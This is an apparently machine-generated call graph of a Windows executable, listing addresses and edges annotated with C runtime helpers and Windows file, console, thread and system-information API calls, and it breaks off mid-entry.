105505->105507 105506->105483 105507->105506 105514 c78ee8 105507->105514 105510 c78f42 105509->105510 105512 c78f53 105509->105512 105511 c34863 80 API calls 105510->105511 105511->105512 105512->105479 105513->105483 105515 c78f14 105514->105515 105517 c78f25 105514->105517 105518 c34863 105515->105518 105517->105507 105519 c3486f __close 105518->105519 105520 c348a5 105519->105520 105521 c3488d 105519->105521 105523 c3489d __close 105519->105523 105524 c36c11 __lock_file 59 API calls 105520->105524 105543 c38b28 58 API calls __getptd_noexit 105521->105543 105523->105517 105526 c348ab 105524->105526 105525 c34892 105544 c38db6 9 API calls __wtof_l 105525->105544 105531 c3470a 105526->105531 105534 c34719 105531->105534 105539 c34737 105531->105539 105532 c34727 105533 c38b28 __wtof_l 58 API calls 105532->105533 105535 c3472c 105533->105535 105534->105532 105534->105539 105542 c34751 _memmove 105534->105542 105536 c38db6 __wtof_l 9 API calls 105535->105536 105536->105539 105537 c3ae1e __flsbuf 78 API calls 105537->105542 105538 c34a3d __flush 78 API calls 105538->105542 105545 c348dd LeaveCriticalSection LeaveCriticalSection _fseek 105539->105545 105540 c346e6 __fseek_nolock 58 API calls 105540->105542 105541 c3d886 __write 78 API calls 105541->105542 105542->105537 105542->105538 105542->105539 105542->105540 105542->105541 105543->105525 105544->105523 105545->105523 105547 c35349 105546->105547 105548 c3535d 105546->105548 105601 c38b28 58 API calls __getptd_noexit 105547->105601 105550 c35359 105548->105550 105565 c34a3d 105548->105565 105564 c35415 LeaveCriticalSection LeaveCriticalSection _fseek 105550->105564 105551 c3534e 105602 c38db6 9 API calls __wtof_l 105551->105602 105557 c346e6 __fseek_nolock 58 API calls 105558 c35377 105557->105558 105575 c40a02 105558->105575 105560 c3537d 105560->105550 105561 c32d55 _free 58 API calls 105560->105561 105561->105550 105562->105497 105563->105501 105564->105501 105566 c34a74 105565->105566 105567 c34a50 105565->105567 105571 c40b77 105566->105571 105567->105566 105568 c346e6 __fseek_nolock 58 API calls 105567->105568 105569 c34a6d 105568->105569 105603 c3d886 105569->105603 105572 c40b84 105571->105572 105574 c35371 105571->105574 105573 c32d55 _free 58 API calls 105572->105573 105572->105574 105573->105574 105574->105557 105576 c40a0e __close 105575->105576 105577 c40a1b 105576->105577 105580 c40a32 105576->105580 105728 c38af4 58 API calls __getptd_noexit 105577->105728 105579 c40abd 105733 c38af4 58 API calls __getptd_noexit 105579->105733 105580->105579 105582 c40a42 105580->105582 105581 c40a20 105729 c38b28 58 API calls __getptd_noexit 105581->105729 105585 c40a60 105582->105585 105586 c40a6a 105582->105586 105730 c38af4 58 API calls __getptd_noexit 105585->105730 105589 c3d206 ___lock_fhandle 59 API calls 105586->105589 105587 c40a65 105734 c38b28 58 API calls __getptd_noexit 105587->105734 105590 c40a70 105589->105590 105592 c40a83 105590->105592 105593 c40a8e 105590->105593 105713 c40add 105592->105713 105731 c38b28 58 API calls __getptd_noexit 105593->105731 105594 c40ac9 105735 c38db6 9 API calls __wtof_l 105594->105735 105597 c40a27 __close 105597->105560 105599 c40a89 105732 c40ab5 LeaveCriticalSection __unlock_fhandle 105599->105732 105601->105551 105602->105550 105604 c3d892 __close 105603->105604 105605 c3d8b6 105604->105605 105606 c3d89f 105604->105606 105608 c3d955 105605->105608 105610 c3d8ca 105605->105610 105704 c38af4 58 API calls __getptd_noexit 105606->105704 105710 c38af4 58 API calls __getptd_noexit 105608->105710 105609 c3d8a4 105705 c38b28 58 API calls __getptd_noexit 105609->105705 105614 c3d8f2 105610->105614 105615 c3d8e8 105610->105615 105612 c3d8ed 105711 c38b28 58 API calls __getptd_noexit 105612->105711 105631 c3d206 105614->105631 105706 c38af4 58 API calls __getptd_noexit 105615->105706 105619 c3d8f8 105621 c3d90b 105619->105621 105622 c3d91e 105619->105622 105620 c3d961 105712 c38db6 9 API calls __wtof_l 105620->105712 105640 c3d975 105621->105640 105707 c38b28 58 API calls __getptd_noexit 105622->105707 105623 c3d8ab __close 105623->105566 105627 c3d917 105709 c3d94d LeaveCriticalSection __unlock_fhandle 105627->105709 105628 c3d923 105708 c38af4 58 API calls __getptd_noexit 105628->105708 105632 c3d212 __close 105631->105632 105633 c3d261 EnterCriticalSection 105632->105633 105634 c39c0b __lock 58 API calls 105632->105634 105635 c3d287 __close 105633->105635 105636 c3d237 105634->105636 105635->105619 105637 c3d24f 105636->105637 105638 c39e2b __mtinitlocks InitializeCriticalSectionAndSpinCount 105636->105638 105639 c3d28b ___lock_fhandle LeaveCriticalSection 105637->105639 105638->105637 105639->105633 105641 c3d982 __ftell_nolock 105640->105641 105642 c3d9c1 105641->105642 105643 c3d9e0 105641->105643 105671 c3d9b6 105641->105671 105644 c38af4 __wsopen_nolock 58 API calls 105642->105644 105647 c3da38 105643->105647 105648 c3da1c 105643->105648 105646 c3d9c6 105644->105646 105645 c3c5f6 __fltin2 6 API calls 105649 c3e1d6 105645->105649 105650 c38b28 __wtof_l 58 API calls 105646->105650 105651 c3da51 105647->105651 105654 c418c1 __lseeki64_nolock 60 API calls 105647->105654 105652 c38af4 __wsopen_nolock 58 API calls 105648->105652 105649->105627 105653 c3d9cd 105650->105653 105655 c45c6b __flsbuf 58 API calls 105651->105655 105656 c3da21 105652->105656 105657 c38db6 __wtof_l 9 API calls 105653->105657 105654->105651 105658 c3da5f 105655->105658 105659 c38b28 __wtof_l 58 API calls 105656->105659 105657->105671 105660 c3ddb8 105658->105660 105665 c399ac __beginthread 58 API calls 105658->105665 105661 c3da28 105659->105661 105662 c3ddd6 105660->105662 105663 c3e14b WriteFile 105660->105663 105664 c38db6 __wtof_l 9 API calls 105661->105664 105666 c3defa 105662->105666 105675 c3ddec 105662->105675 105667 c3ddab GetLastError 105663->105667 105673 c3dd78 105663->105673 105664->105671 105668 c3da8b GetConsoleMode 105665->105668 105677 c3df05 105666->105677 105681 c3dfef 105666->105681 105667->105673 105668->105660 105670 c3daca 105668->105670 105669 c3e184 105669->105671 105672 c38b28 __wtof_l 58 API calls 105669->105672 105670->105660 105674 c3dada GetConsoleCP 105670->105674 105671->105645 105679 c3e1b2 105672->105679 105673->105669 105673->105671 105680 c3ded8 105673->105680 105674->105669 105702 c3db09 105674->105702 105675->105669 105676 c3de5b WriteFile 105675->105676 105676->105667 105678 c3de98 105676->105678 105677->105669 105682 c3df6a WriteFile 105677->105682 105678->105675 105683 c3debc 105678->105683 105684 c38af4 __wsopen_nolock 58 API calls 105679->105684 105685 c3dee3 105680->105685 105686 c3e17b 105680->105686 105681->105669 105687 c3e064 WideCharToMultiByte 105681->105687 105682->105667 105688 c3dfb9 105682->105688 105683->105673 105684->105671 105689 c38b28 __wtof_l 58 API calls 105685->105689 105690 c38b07 __dosmaperr 58 API calls 105686->105690 105687->105667 105696 c3e0ab 105687->105696 105688->105673 105688->105677 105688->105683 105692 c3dee8 105689->105692 105690->105671 105691 c3e0b3 WriteFile 105694 c3e106 GetLastError 105691->105694 105691->105696 105695 c38af4 __wsopen_nolock 58 API calls 105692->105695 105693 c335f5 __write_nolock 58 API calls 105693->105702 105694->105696 105695->105671 105696->105673 105696->105681 105696->105683 105696->105691 105697 c462ba 60 API calls __write_nolock 105697->105702 105698 c47a5e WriteConsoleW CreateFileW __putwch_nolock 105701 c3dc5f 105698->105701 105699 c3dbf2 WideCharToMultiByte 105699->105673 105700 c3dc2d WriteFile 105699->105700 105700->105667 105700->105701 105701->105667 105701->105673 105701->105698 105701->105702 105703 c3dc87 WriteFile 105701->105703 105702->105673 105702->105693 105702->105697 105702->105699 105702->105701 105703->105667 105703->105701 105704->105609 105705->105623 105706->105612 105707->105628 105708->105627 105709->105623 105710->105612 105711->105620 105712->105623 105736 c3d4c3 105713->105736 105715 c40b41 105749 c3d43d 59 API calls 2 library calls 105715->105749 105717 c40aeb 105717->105715 105718 c40b1f 105717->105718 105721 c3d4c3 __chsize_nolock 58 API calls 105717->105721 105718->105715 105719 c3d4c3 __chsize_nolock 58 API calls 105718->105719 105722 c40b2b CloseHandle 105719->105722 105720 c40b49 105723 c40b6b 105720->105723 105750 c38b07 58 API calls 3 library calls 105720->105750 105724 c40b16 105721->105724 105722->105715 105725 c40b37 GetLastError 105722->105725 105723->105599 105727 c3d4c3 __chsize_nolock 58 API calls 105724->105727 105725->105715 105727->105718 105728->105581 105729->105597 105730->105587 105731->105599 105732->105597 105733->105587 105734->105594 105735->105597 105737 c3d4e3 105736->105737 105738 c3d4ce 105736->105738 105740 c38af4 __wsopen_nolock 58 API calls 105737->105740 105744 c3d508 105737->105744 105739 c38af4 __wsopen_nolock 58 API calls 105738->105739 105741 c3d4d3 105739->105741 105742 c3d512 105740->105742 105743 c38b28 __wtof_l 58 API calls 105741->105743 105745 c38b28 __wtof_l 58 API calls 105742->105745 105746 c3d4db 105743->105746 105744->105717 105747 c3d51a 105745->105747 105746->105717 105748 c38db6 __wtof_l 9 API calls 105747->105748 105748->105746 105749->105720 105750->105723 105813 c41940 105751->105813 105754 c14799 105819 c17d8c 105754->105819 105755 c1477c 105757 c17bcc 59 API calls 105755->105757 105758 c14788 105757->105758 105815 c17726 105758->105815 105761 c30791 105762 c41940 __ftell_nolock 105761->105762 105763 c3079e GetLongPathNameW 105762->105763 105764 c17bcc 59 API calls 105763->105764 105765 c172bd 105764->105765 105766 c1700b 105765->105766 105767 c17667 59 API calls 105766->105767 105768 c1701d 105767->105768 105769 c14750 60 API calls 105768->105769 105770 c17028 105769->105770 105771 c17033 105770->105771 105776 c4e885 105770->105776 105772 c13f74 59 API calls 105771->105772 105774 c1703f 105772->105774 105823 c134c2 105774->105823 105777 c4e89f 105776->105777 105829 c17908 61 API calls 105776->105829 105778 c17052 Mailbox 105778->104687 105780 c14ddd 136 API calls 105779->105780 105781 c1688f 105780->105781 105782 c4e031 105781->105782 105784 c14ddd 136 API calls 105781->105784 105783 c7955b 122 API calls 105782->105783 105785 c4e046 105783->105785 105786 c168a3 105784->105786 105787 c4e067 105785->105787 105788 c4e04a 105785->105788 105786->105782 105789 c168ab 105786->105789 105791 c30db6 Mailbox 59 API calls 105787->105791 105790 c14e4a 84 API calls 105788->105790 105792 c4e052 105789->105792 105793 c168b7 105789->105793 105790->105792 105802 c4e0ac Mailbox 105791->105802 105922 c742f8 90 API calls _wprintf 105792->105922 105830 c16a8c 105793->105830 105797 c4e060 105797->105787 105798 c4e260 105799 c32d55 _free 58 API calls 105798->105799 105800 c4e268 105799->105800 105801 c14e4a 84 API calls 105800->105801 105807 c4e271 105801->105807 105802->105798 105802->105807 105810 c17de1 59 API calls 105802->105810 105923 c6f73d 59 API calls 2 library calls 105802->105923 105924 c6f65e 61 API calls 2 library calls 105802->105924 105925 c7737f 59 API calls Mailbox 105802->105925 105926 c1750f 59 API calls 2 library calls 105802->105926 105927 c1735d 59 API calls Mailbox 105802->105927 105806 c32d55 _free 58 API calls 105806->105807 105807->105806 105808 c14e4a 84 API calls 105807->105808 105928 c6f7a1 89 API calls 4 library calls 105807->105928 105808->105807 105810->105802 105814 c1475d GetFullPathNameW 105813->105814 105814->105754 105814->105755 105816 c17734 105815->105816 105817 c17d2c 59 API calls 105816->105817 105818 c14794 105817->105818 105818->105761 105820 c17da6 105819->105820 105821 c17d99 105819->105821 105822 c30db6 Mailbox 59 API calls 105820->105822 105821->105758 105822->105821 105824 c134d4 105823->105824 105828 c134f3 _memmove 105823->105828 105827 c30db6 Mailbox 59 API calls 105824->105827 105825 c30db6 Mailbox 59 API calls 105826 c1350a 105825->105826 105826->105778 105827->105828 105828->105825 105829->105776 105831 c16ab5 105830->105831 105832 c4e41e 105830->105832 105934 c157a6 60 API calls Mailbox 105831->105934 106020 c6f7a1 89 API calls 4 library calls 105832->106020 105835 c16ad7 105935 c157f6 105835->105935 105836 c4e431 106021 c6f7a1 89 API calls 4 library calls 105836->106021 105840 c16af4 105842 c17667 59 API calls 105840->105842 105841 c4e44d 105844 c16b61 105841->105844 105843 c16b00 105842->105843 105948 c30957 60 API calls __ftell_nolock 105843->105948 105846 c4e460 105844->105846 105847 c16b6f 105844->105847 105849 c15c6f CloseHandle 105846->105849 105850 c17667 59 API calls 105847->105850 105848 c16b0c 105851 c17667 59 API calls 105848->105851 105853 c4e46c 105849->105853 105854 c16b78 105850->105854 105852 c16b18 105851->105852 105855 c14750 60 API calls 105852->105855 105856 c14ddd 136 API calls 105853->105856 105857 c17667 59 API calls 105854->105857 105858 c16b26 105855->105858 105859 c4e488 105856->105859 105860 c16b81 105857->105860 105949 c15850 ReadFile SetFilePointerEx 105858->105949 105862 c4e4b1 105859->105862 105865 c7955b 122 API calls 105859->105865 105958 c1459b 105860->105958 106022 c6f7a1 89 API calls 4 library calls 105862->106022 105864 c16b52 105950 c15aee 105864->105950 105869 c4e4a4 105865->105869 105866 c16b98 105870 c17b2e 59 API calls 105866->105870 105871 c4e4ac 105869->105871 105872 c4e4cd 105869->105872 105875 c14e4a 84 API calls 105871->105875 105874 c14e4a 84 API calls 105872->105874 105876 c4e4d2 105874->105876 105875->105862 105877 c30db6 Mailbox 59 API calls 105876->105877 105884 c4e506 105877->105884 105881 c13bbb 105881->104553 105881->104577 106023 c1750f 59 API calls 2 library calls 105884->106023 105889 c4e740 106029 c772df 59 API calls Mailbox 105889->106029 105893 c4e762 106030 c8fbce 59 API calls 2 library calls 105893->106030 105896 c4e76f 105898 c32d55 _free 58 API calls 105896->105898 105903 c16d0c Mailbox 105898->105903 105929 c157d4 105903->105929 105912 c17de1 59 API calls 105919 c4e54f Mailbox 105912->105919 105916 c4e792 106031 c6f7a1 89 API calls 4 library calls 105916->106031 105918 c4e7ab 105920 c32d55 _free 58 API calls 105918->105920 105919->105889 105919->105912 105919->105916 106024 c6f73d 59 API calls 2 library calls 105919->106024 106025 c6f65e 61 API calls 2 library calls 105919->106025 106026 c7737f 59 API calls Mailbox 105919->106026 106027 c1750f 59 API calls 2 library calls 105919->106027 106028 c17213 59 API calls Mailbox 105919->106028 105921 c4e4c8 105920->105921 105921->105903 105922->105797 105923->105802 105924->105802 105925->105802 105926->105802 105927->105802 105928->105807 105930 c15c6f CloseHandle 105929->105930 105931 c157dc Mailbox 105930->105931 105932 c15c6f CloseHandle 105931->105932 105933 c157eb 105932->105933 105933->105881 105934->105835 105936 c15c6f CloseHandle 105935->105936 105937 c15802 105936->105937 106034 c15c99 105937->106034 105939 c15844 105939->105836 105939->105840 105940 c15821 105940->105939 106042 c15610 105940->106042 105942 c15833 106059 c1527b SetFilePointerEx SetFilePointerEx 105942->106059 105944 c4dc07 106060 c7345a SetFilePointerEx SetFilePointerEx WriteFile 105944->106060 105945 c1583a 105945->105939 105945->105944 105947 c4dc37 105947->105939 105948->105848 105949->105864 105955 c15b08 105950->105955 105951 c15b8f SetFilePointerEx 106073 c15c4e SetFilePointerEx 105951->106073 105952 c4dd28 106074 c15c4e SetFilePointerEx 105952->106074 105955->105951 105955->105952 105957 c15b63 105955->105957 105956 c4dd42 105957->105844 105959 c17667 59 API calls 105958->105959 105960 c145b1 105959->105960 105961 c17667 59 API calls 105960->105961 105962 c145b9 105961->105962 105963 c17667 59 API calls 105962->105963 105964 c145c1 105963->105964 105965 c17667 59 API calls 105964->105965 105966 c145c9 105965->105966 105967 c4d4d2 105966->105967 105968 c145fd 105966->105968 105969 c18047 59 API calls 105967->105969 105970 c1784b 59 API calls 105968->105970 105971 c4d4db 105969->105971 105972 c1460b 105970->105972 105973 c17d8c 59 API calls 105971->105973 105974 c17d2c 59 API calls 105972->105974 105976 c14640 105973->105976 105975 c14615 105974->105975 105975->105976 105977 c1784b 59 API calls 105975->105977 105978 c14680 105976->105978 105980 c1465f 105976->105980 105991 c4d4fb 105976->105991 105981 c14636 105977->105981 106075 c1784b 105978->106075 105985 c179f2 59 API calls 105980->105985 105984 c17d2c 59 API calls 105981->105984 105982 c14691 105986 c146a3 105982->105986 105989 c18047 59 API calls 105982->105989 105983 c4d5cb 105987 c17bcc 59 API calls 105983->105987 105984->105976 105988 c14669 105985->105988 105990 c146b3 105986->105990 105992 c18047 59 API calls 105986->105992 106004 c4d588 105987->106004 105988->105978 105995 c1784b 59 API calls 105988->105995 105989->105986 105994 c146ba 105990->105994 105996 c18047 59 API calls 105990->105996 105991->105983 105993 c4d5b4 105991->105993 106003 c4d532 105991->106003 105992->105990 105993->105983 105999 c4d59f 105993->105999 105997 c18047 59 API calls 105994->105997 106006 c146c1 Mailbox 105994->106006 105995->105978 105996->105994 105997->106006 105998 c179f2 59 API calls 105998->106004 106001 c17bcc 59 API calls 105999->106001 106000 c4d590 106002 c17bcc 59 API calls 106000->106002 106001->106004 106002->106004 106003->106000 106007 c4d57b 106003->106007 106004->105978 106004->105998 106088 c17924 59 API calls 2 library calls 106004->106088 106006->105866 106008 c17bcc 59 API calls 106007->106008 106008->106004 106020->105836 106021->105841 106022->105921 106023->105919 106024->105919 106025->105919 106026->105919 106027->105919 106028->105919 106029->105893 106030->105896 106031->105918 106035 c15cb2 CreateFileW 106034->106035 106036 c4dd58 106034->106036 106038 c15cd4 106035->106038 106037 c4dd5e CreateFileW 106036->106037 106036->106038 106037->106038 106039 c4dd84 106037->106039 106038->105940 106040 c15aee 2 API calls 106039->106040 106041 c4dd8f 106040->106041 106041->106038 106043 c4dba5 106042->106043 106044 c1562b 106042->106044 106058 c156ba 106043->106058 106067 c15cdf 106043->106067 106045 c15aee 2 API calls 106044->106045 106044->106058 106046 c1564d 106045->106046 106048 c1522e 59 API calls 106046->106048 106049 c15657 106048->106049 106049->106043 106050 c15664 106049->106050 106051 c30db6 Mailbox 59 API calls 106050->106051 106052 c1566f 106051->106052 106053 c1522e 59 API calls 106052->106053 106054 c1567a 106053->106054 106061 c15bc0 106054->106061 106056 c156a7 106057 c15aee 2 API calls 106056->106057 106057->106058 106058->105942 106059->105945 106060->105947 106062 c15c33 106061->106062 106066 c15bce 106061->106066 106072 c15c4e SetFilePointerEx 106062->106072 106063 c15bf6 106063->106056 106065 c15c06 ReadFile 106065->106063 106065->106066 106066->106063 106066->106065 106068 c15aee 2 API calls 106067->106068 106069 c15d00 106068->106069 106070 c15aee 2 API calls 106069->106070 106071 c15d14 106070->106071 106071->106058 106072->106066 106073->105957 106074->105956 106076 c178b7 106075->106076 106077 c1785a 106075->106077 106078 c17d2c 59 API calls 106076->106078 106077->106076 106079 c17865 106077->106079 106085 c17888 _memmove 106078->106085 106080 c17880 106079->106080 106081 c4eb09 106079->106081 106089 c17f27 59 API calls Mailbox 106080->106089 106082 c18029 59 API calls 106081->106082 106084 c4eb13 106082->106084 106086 c30db6 Mailbox 59 API calls 106084->106086 106085->105982 106087 c4eb33 106086->106087 106088->106004 106089->106085 106091 c16d95 106090->106091 106092 c16ea9 106090->106092 106091->106092 106093 c30db6 Mailbox 59 API calls 106091->106093 106092->104693 106095 c16dbc 106093->106095 106094 c30db6 Mailbox 59 API calls 106096 c16e31 106094->106096 106095->106094 106096->106092 106103 c16240 106096->106103 106128 c1735d 59 API calls Mailbox 106096->106128 106129 c66553 59 API calls Mailbox 106096->106129 106130 c1750f 59 API calls 2 library calls 106096->106130 106101->104695 106102->104697 106104 c17a16 59 API calls 106103->106104 106121 c16265 106104->106121 106105 c1646a 106133 c1750f 59 API calls 2 library calls 106105->106133 106110 c17d8c 59 API calls 106110->106121 106111 c1750f 59 API calls 106111->106121 106112 c4dff6 106136 c6f8aa 91 API calls 4 library calls 106112->106136 106118 c16799 _memmove 106138 c6f8aa 91 API calls 4 library calls 106118->106138 106120 c4df92 106122 c18029 59 API calls 106120->106122 106121->106105 106121->106110 106121->106111 106121->106112 106121->106118 106121->106120 106125 c17e4f 59 API calls 106121->106125 106131 c15f6c 60 API calls 106121->106131 106132 c15d41 59 API calls Mailbox 106121->106132 106134 c15e72 60 API calls 106121->106134 106135 c17924 59 API calls 2 library calls 106121->106135 106126 c1643b CharUpperBuffW 106125->106126 106126->106121 106128->106096 106129->106096 106130->106096 106131->106121 106132->106121 106134->106121 106135->106121 106139->104712 106140->104711 106635 c11066 106640 c1f76f 106635->106640 106637 c1106c 106638 c32d40 __cinit 67 API calls 106637->106638 106639 c11076 106638->106639 106641 c1f790 106640->106641 106673 c2ff03 106641->106673 106645 c1f7d7 106646 c17667 59 API calls 106645->106646 106647 c1f7e1 106646->106647 106648 c17667 59 API calls 106647->106648 106649 c1f7eb 106648->106649 106650 c17667 59 API calls 106649->106650 106651 c1f7f5 106650->106651 106652 c17667 59 API calls 106651->106652 106653 c1f833 106652->106653 106654 c17667 59 API calls 106653->106654 106655 c1f8fe 106654->106655 106683 c25f87 106655->106683 106659 c1f930 106660 c17667 59 API calls 106659->106660 106661 c1f93a 106660->106661 106711 c2fd9e 106661->106711 106663 c1f981 106664 c1f991 GetStdHandle 106663->106664 106665 c1f9dd 106664->106665 106666 c545ab 106664->106666 106667 c1f9e5 OleInitialize 106665->106667 106666->106665 106668 c545b4 106666->106668 106667->106637 106718 c76b38 64 API calls Mailbox 106668->106718 106670 c545bb 106719 c77207 CreateThread 106670->106719 106672 c545c7 CloseHandle 106672->106667 106720 c2ffdc 106673->106720 106676 c2ffdc 59 API calls 106677 c2ff45 106676->106677 106678 c17667 59 API calls 106677->106678 106679 c2ff51 106678->106679 106680 c17bcc 59 API calls 106679->106680 106681 c1f796 106680->106681 106682 c30162 6 API calls 106681->106682 106682->106645 106684 c17667 59 API calls 106683->106684 106685 c25f97 106684->106685 106686 c17667 59 API calls 106685->106686 106687 c25f9f 106686->106687 106727 c25a9d 106687->106727 106690 c25a9d 59 API calls 106691 c25faf 106690->106691 106692 c17667 59 API calls 106691->106692 106693 c25fba 106692->106693 106694 c30db6 Mailbox 59 API calls 106693->106694 106695 c1f908 106694->106695 106696 c260f9 106695->106696 106697 c26107 106696->106697 106698 c17667 59 API calls 106697->106698 106699 c26112 106698->106699 106700 c17667 59 API calls 106699->106700 106701 c2611d 106700->106701 106702 c17667 59 API calls 106701->106702 106703 c26128 106702->106703 106704 c17667 59 API calls 106703->106704 106705 c26133 106704->106705 106706 c25a9d 59 API calls 106705->106706 106707 c2613e 106706->106707 106708 c30db6 Mailbox 59 API calls 106707->106708 106709 c26145 RegisterWindowMessageW 106708->106709 106709->106659 106712 c6576f 106711->106712 106713 c2fdae 106711->106713 106730 c79ae7 60 API calls 106712->106730 106714 c30db6 Mailbox 59 API calls 106713->106714 106717 c2fdb6 106714->106717 106716 c6577a 106717->106663 106718->106670 106719->106672 106731 c771ed 65 API calls 106719->106731 106721 c17667 59 API calls 106720->106721 106722 c2ffe7 106721->106722 106723 c17667 59 API calls 106722->106723 106724 c2ffef 106723->106724 106725 c17667 59 API calls 106724->106725 106726 c2ff3b 106725->106726 106726->106676 106728 c17667 59 API calls 106727->106728 106729 c25aa5 106728->106729 106729->106690 106730->106716 106732 c11016 106737 c14974 106732->106737 106735 c32d40 __cinit 67 API calls 106736 c11025 106735->106736 106738 c30db6 Mailbox 59 API calls 106737->106738 106739 c1497c 106738->106739 106740 c1101b 106739->106740 106744 c14936 106739->106744 106740->106735 106745 c14951 106744->106745 106746 c1493f 106744->106746 106748 c149a0 106745->106748 106747 c32d40 __cinit 67 API calls 106746->106747 106747->106745 106749 c17667 59 API calls 106748->106749 106750 c149b8 GetVersionExW 106749->106750 106751 c17bcc 59 API calls 106750->106751 106752 c149fb 106751->106752 106753 c17d2c 59 API calls 106752->106753 106764 c14a28 106752->106764 106754 c14a1c 106753->106754 106755 c17726 59 API calls 106754->106755 106755->106764 106756 c14a93 GetCurrentProcess IsWow64Process 106758 c14aac 106756->106758 106757 c4d864 106759 c14ac2 106758->106759 106760 c14b2b GetSystemInfo 106758->106760 106772 c14b37 106759->106772 106761 c14af8 106760->106761 106761->106740 106764->106756 106764->106757 106765 c14ad4 106767 c14b37 2 API calls 106765->106767 106766 c14b1f GetSystemInfo 106768 c14ae9 106766->106768 106769 c14adc GetNativeSystemInfo 106767->106769 106768->106761 106770 c14aef FreeLibrary 106768->106770 106769->106768 106770->106761 106773 c14ad0 106772->106773 106774 c14b40 LoadLibraryA 106772->106774 106773->106765 106773->106766 106774->106773 106775 c14b51 GetProcAddress 106774->106775 106775->106773 106776 c4fdfc 106793 c1ab30 Mailbox _memmove 106776->106793 106778 c6617e Mailbox 59 API calls 106789 c1a057 106778->106789 106780 c1b525 106965 c79e4a 89 API calls 4 library calls 106780->106965 106783 c509e5 106970 c79e4a 89 API calls 4 library calls 106783->106970 106784 c50055 106964 c79e4a 89 API calls 4 library calls 106784->106964 106786 c1b475 106794 c18047 59 API calls 106786->106794 106790 c50064 106791 c30db6 59 API calls Mailbox 106800 c19f37 Mailbox 106791->106800 106792 c18047 59 API calls 106792->106800 106793->106780 106793->106789 106793->106800 106803 c17de1 59 API calls 106793->106803 106807 c8bc6b 341 API calls 106793->106807 106809 c30db6 59 API calls Mailbox 106793->106809 106810 c1b2b6 106793->106810 106811 c19ea0 341 API calls 106793->106811 106813 c5086a 106793->106813 106815 c50878 106793->106815 106817 c5085c 106793->106817 106818 c1b21c 106793->106818 106822 c66e8f 59 API calls 106793->106822 106826 c21fc3 106793->106826 106866 c7d07b 106793->106866 106913 c8df23 106793->106913 106916 c8c2e0 106793->106916 106948 c77956 106793->106948 106954 c6617e 106793->106954 106959 c19c90 59 API calls Mailbox 106793->106959 106963 c8c193 85 API calls 2 library calls 106793->106963 106794->106789 106796 c1b47a 106796->106783 106796->106784 106798 c17667 59 API calls 106798->106800 106800->106784 106800->106786 106800->106789 106800->106791 106800->106792 106800->106796 106800->106798 106801 c66e8f 59 API calls 106800->106801 106802 c32d40 67 API calls __cinit 106800->106802 106804 c509d6 106800->106804 106806 c1a55a 106800->106806 106957 c1c8c0 341 API calls 2 library calls 106800->106957 106958 c1b900 60 API calls Mailbox 106800->106958 106801->106800 106802->106800 106803->106793 106969 c79e4a 89 API calls 4 library calls 106804->106969 106968 c79e4a 89 API calls 4 library calls 106806->106968 106807->106793 106809->106793 106962 c1f6a3 341 API calls 106810->106962 106811->106793 106966 c19c90 59 API calls Mailbox 106813->106966 106967 c79e4a 89 API calls 4 library calls 106815->106967 106817->106778 106817->106789 106960 c19d3c 60 API calls Mailbox 106818->106960 106820 c1b22d 106961 c19d3c 60 API calls Mailbox 106820->106961 106822->106793 106827 c19a98 59 API calls 106826->106827 106828 c21fdb 106827->106828 106830 c30db6 Mailbox 59 API calls 106828->106830 106836 c56585 106828->106836 106831 c21ff4 106830->106831 106833 c22004 106831->106833 106986 c157a6 60 API calls Mailbox 106831->106986 106832 c22029 106843 c22036 106832->106843 106991 c19b3c 59 API calls 106832->106991 106835 c19837 84 API calls 106833->106835 106837 c22012 106835->106837 106836->106832 106990 c7f574 59 API calls 106836->106990 106839 c157f6 67 API calls 106837->106839 106841 c22021 106839->106841 106840 c565cd 106842 c565d5 106840->106842 106840->106843 106841->106832 106841->106836 106989 c158ba CloseHandle 106841->106989 106992 c19b3c 59 API calls 106842->106992 106844 c15cdf 2 API calls 106843->106844 106847 c2203d 106844->106847 106848 c565e7 106847->106848 106849 c22057 106847->106849 106850 c30db6 Mailbox 59 API calls 106848->106850 106851 c17667 59 API calls 106849->106851 106852 c565ed 106850->106852 106853 c2205f 106851->106853 106854 c56601 106852->106854 106993 c15850 ReadFile SetFilePointerEx 106852->106993 106971 c15572 106853->106971 106860 c56605 _memmove 106854->106860 106994 c776c4 59 API calls 2 library calls 106854->106994 106858 c2206e 106858->106860 106987 c19a3c 59 API calls Mailbox 106858->106987 106861 c22082 Mailbox 106862 c220bc 106861->106862 106863 c15c6f CloseHandle 106861->106863 106862->106793 106864 c220b0 106863->106864 106864->106862 106988 c158ba CloseHandle 106864->106988 106867 c7d0a5 106866->106867 106868 c7d09a 106866->106868 106871 c17667 59 API calls 106867->106871 106911 c7d17f Mailbox 106867->106911 107032 c19b3c 59 API calls 106868->107032 106870 c30db6 Mailbox 59 API calls 106872 c7d1c8 106870->106872 106873 c7d0c9 106871->106873 106874 c7d1d4 106872->106874 107035 c157a6 60 API calls Mailbox 106872->107035 106875 c17667 59 API calls 106873->106875 106877 c19837 84 API calls 106874->106877 106878 c7d0d2 106875->106878 106879 c7d1ec 106877->106879 106880 c19837 84 API calls 106878->106880 106881 c157f6 67 API calls 106879->106881 106882 c7d0de 106880->106882 106883 c7d1fb 106881->106883 106884 c1459b 59 API calls 106882->106884 106885 c7d1ff GetLastError 106883->106885 106887 c7d233 106883->106887 106886 c7d0f3 106884->106886 106888 c7d218 106885->106888 106889 c17b2e 59 API calls 106886->106889 106890 c7d295 106887->106890 106891 c7d25e 106887->106891 106909 c7d188 Mailbox 106888->106909 107036 c158ba CloseHandle 106888->107036 106892 c7d126 106889->106892 106895 c30db6 Mailbox 59 API calls 106890->106895 106893 c30db6 Mailbox 59 API calls 106891->106893 106894 c7d178 106892->106894 106900 c73c37 3 API calls 106892->106900 106897 c7d263 106893->106897 107034 c19b3c 59 API calls 106894->107034 106896 c7d29a 106895->106896 106903 c17667 59 API calls 106896->106903 106896->106909 106901 c7d274 106897->106901 106904 c17667 59 API calls 106897->106904 106902 c7d136 106900->106902 107037 c8fbce 59 API calls 2 library calls 106901->107037 106902->106894 106905 c7d13a 106902->106905 106903->106909 106904->106901 106906 c17de1 59 API calls 106905->106906 106908 c7d147 106906->106908 107033 c73a2a 63 API calls Mailbox 106908->107033 106909->106793 106911->106870 106911->106909 106912 c7d150 Mailbox 106912->106894 106914 c8cadd 130 API calls 106913->106914 106915 c8df33 106914->106915 106915->106793 106917 c17667 59 API calls 106916->106917 106918 c8c2f4 106917->106918 106919 c17667 59 API calls 106918->106919 106920 c8c2fc 106919->106920 106921 c17667 59 API calls 106920->106921 106922 c8c304 106921->106922 106923 c19837 84 API calls 106922->106923 106947 c8c312 106923->106947 106924 c17bcc 59 API calls 106924->106947 106925 c8c4fb 106926 